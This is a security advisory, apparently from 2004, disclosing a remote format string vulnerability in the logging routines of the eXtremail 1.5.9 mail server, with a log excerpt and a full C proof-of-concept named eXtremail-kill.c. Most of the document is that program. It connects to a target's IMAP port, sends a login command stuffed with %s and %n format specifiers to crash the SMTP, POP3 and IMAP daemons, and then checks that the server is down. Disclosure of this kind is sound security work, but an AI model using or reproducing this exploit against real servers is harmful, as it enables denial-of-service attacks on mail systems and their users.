Remote Format String Vulnerabilities in eXtremail
Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String
What?s eXtremail:
eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack ,SSL connection
and Antivirus checking.
Vulnerability Description:
Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers to various SMTP,POP and IMAP commands.
The vulnerability has been reported to affect some previous versions
(BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.
Here is a snippet of eXtremail's log:
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN -
Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
After a successful denial of service attack, eXtremail must be restarted
to regain its functionality (Smptd,Pop3d,Imapd,Remt).
Proof of Concept:
------ eXtremail-kill.c --------
/**********************************************
* Proof of Concept *
* eXtremail 1.5.x Denial of Service *
* *
* Luca Ercoli <luca.e [at] seeweb.com> *
* Seeweb http://www.seeweb.com *
* *
***********************************************/
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 143
#define MAXRECVSIZE 100
int main(int argc, char *argv[]);
void crash(char *host,int TYPE);
int numbytes;
void crash(char *host,int TYPE)
{
int sockfd;
char buf[MAXRECVSIZE];
struct hostent *he;
struct sockaddr_in their_addr;
char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";
if ((he=gethostbyname(host)) == NULL)
{
perror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))
== -1)
{
perror("connect");
exit(1);
}
if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
{
perror("recv");
exit(1);
}
buf[numbytes] = '\0';
if (TYPE == 0)
{
printf("[+] Server -> %s",buf);
sleep(1);
printf("\n[!] Sending malicious packet...\n");
send(sockfd,poc, strlen(poc), 0);
sleep(1);
printf ("\n[+] Sent!\n");
}
close(sockfd);
}
int main(int argc, char *argv[])
{
printf("\n\n eXtremail 1.5.x Denial of Service \n");
printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");
if (argc != 2)
{
fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
exit(1);
}
crash(argv[1],0);
numbytes=0;
printf ("\n[+] Checking server status ...\n");
if(!fork()) crash(argv[1],1);
sleep(5);
if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");
return 0;
}
-------------------------------
Solution:
No solution available at the moment.
Credits:
--
Luca Ercoli <luca.e [at] seeweb.com>
Seeweb http://www.seeweb.com